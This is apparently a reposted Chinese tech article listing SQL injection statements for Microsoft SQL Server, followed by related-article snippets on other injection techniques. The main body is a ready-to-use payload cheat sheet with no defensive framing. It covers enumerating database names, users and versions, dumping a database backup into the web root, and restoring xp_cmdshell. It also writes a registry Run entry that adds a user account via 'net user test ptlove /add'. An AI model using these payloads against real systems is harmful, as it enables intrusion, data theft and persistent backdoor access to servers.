sql注入语句有哪些

2024-04-02 19:04:59 203人浏览薄情痞子

摘要

sql注入语句有：返回的是连接的数据库名：and db_name()>0获取连接用户名：and user>0将数据库备份到WEB目录下面：;backup database 数据库名 to disk='c:\inetpub\wwwroot\1

sql注入语句有哪些

sql注入语句有：

返回的是连接的数据库名：

and db_name()>0

获取连接用户名：

and user>0

将数据库备份到WEB目录下面：

;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--

显示SQL系统版本：

and 1=(select @@VERSioN) 或and 1=convert(int,@@version)--

判断xp_cmdshell扩展存储过程是否存在：

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

恢复xp_cmdshell扩展存储的命令：

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--

向启动组中写入命令行和执行程序：

;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWARE\Microsoft\windows\CurrentVersion\ Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

查看当前的数据库名称：

and 0 <> db_name(n) n改成0,1,2,3……就可以跨库了 或and 1=convert(int,db_name())--

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: sql注入语句有哪些

本文链接: https://www.lsjlt.com/news/116377.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

sql注入语句有哪些

sql注入语句有：返回的是连接的数据库名：and db_name()>0获取连接用户名：and user>0将数据库备份到Web目录下面：;backup database 数据库名 to disk='c:\inetpub\wwwroot\1...

99+

2022-10-15
sql注入语句有哪3种

sql注入语句有:1、数字型注入点。2、字符型注入点。3、搜索型注入点。数字型注入点多数网页链接结构像 http://xxx.com/user.phpid=1，基于此种形式的注入，一般被叫做数字型注入点，因为其注入点 id 类型为数字，在...

99+

2022-10-24
SQL语句编写注意点有哪些

这篇文章给大家分享的是有关SQL语句编写注意点有哪些的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。1、使用英文模式下的 “`” 注意此处不是单引号正确格式： &nb...

99+

2022-10-19
有哪些SQL语句

这篇文章主要讲解了“有哪些SQL语句”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“有哪些SQL语句”吧！select 子句主要决定了从表中取出的列...

99+

2022-10-18
SQL语句的注意事项有哪些呢

本篇文章给大家分享的是有关SQL语句的注意事项有哪些呢，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。　　在应用系统开发初期，由于开发数据库数据...

99+

2022-10-18
PHP+MySQL手工注入语句有哪些

这篇文章将为大家详细讲解有关PHP+MySQL手工注入语句有哪些，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。暴字段长度Order by num/*匹配字段and 1=1 union selec...

99+

2023-06-05
sql语句都有哪些

这篇文章将为大家详细讲解有关sql语句都有哪些，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。Windows中运行cmd的Sqlplus中设置每行显示的数据长...

99+

2022-10-18
sql注入怎么插入语句

sql注入中插入语句的语法格式为：Insert into 表名（字段1，字段2，字段3，...）values （值1，值2，值3...）;示例：//插入一个user用户表，字段有id、name，值为1和linInsert into 'use...

99+

2022-10-09
Oracle SQL注入常用语句

解析IPselect utl_inaddr.get_host_address('google.com') from dual; 获取本机IP地址select utl_inaddr.get...

99+

2022-10-18
SQL语句规范有哪些

这篇文章将为大家详细讲解有关SQL语句规范有哪些，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。书写风格1. 语句关键字应全部使用小写。2. 引用字符时应使用...

99+

2022-10-18
常用SQL语句有哪些

这篇文章将为大家详细讲解有关常用SQL语句有哪些，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。说明：以下五十个语句都按照测试数据进行过测试，最好每次只单独运行一个语句。问...

99+

2022-10-19
MySQL中sql语句有哪些

小编给大家分享一下MySQL中sql语句有哪些，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！以下两个表格做讲解SELECTSELECT &quo...

99+

2023-06-29
DBA常用SQL语句有哪些

DBA常用SQL语句有哪些，很多新手对此不是很清楚，为了帮助大家解决这个难题，下面小编将为大家详细讲解，有这方面需求的人可以来学习下，希望你能有所收获。 select tablespace_...

99+

2022-10-19
sql中常见语句有哪些

小编给大家分享一下sql中常见语句有哪些，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！结构化查询语言(Structured Qu...

99+

2022-10-18
常用的SQL语句有哪些

本篇内容介绍了“常用的SQL语句有哪些”的有关知识，在实际案例的操作过程中，不少人都会遇到这样的困境，接下来就让小编带领大家学习一下如何处理这些情况吧！希望大家仔细阅读，能够学有所成！ ~~~~~~~数据库...

99+

2022-10-18
SQL语句知识点有哪些

本篇内容主要讲解“SQL语句知识点有哪些”，感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷，实用性强。下面就让小编来带大家学习“SQL语句知识点有哪些”吧!一、SQL简介SQL (Structured ...

99+

2022-10-19
高性能SQL语句有哪些

这篇文章主要介绍“高性能SQL语句有哪些”，在日常操作中，相信很多人在高性能SQL语句有哪些问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答”高性能SQL语句有哪些”的疑惑有所帮助！接下来，请跟着小编一起来学习吧...

99+

2023-06-08
sql注入语句有三种分别是什么

这篇文章主要介绍sql注入语句有三种分别是什么，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！sql注入语句有三种，分别是：1、数字型注入点，语句如“select * fro...

99+

2022-10-18
sql注入有哪些参数

sql注入参数有：user(): 数据库用户，格式为user() @serverdatabase(): 当前数据库名称version(): 当前数据版本，例如5.x.x-n1等@@datadir: 数据库路径，通常用于load_file时猜...

99+

2022-10-12
手工MSSQL注入常用SQL语句

个人收集整理and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) /...

99+

2022-10-18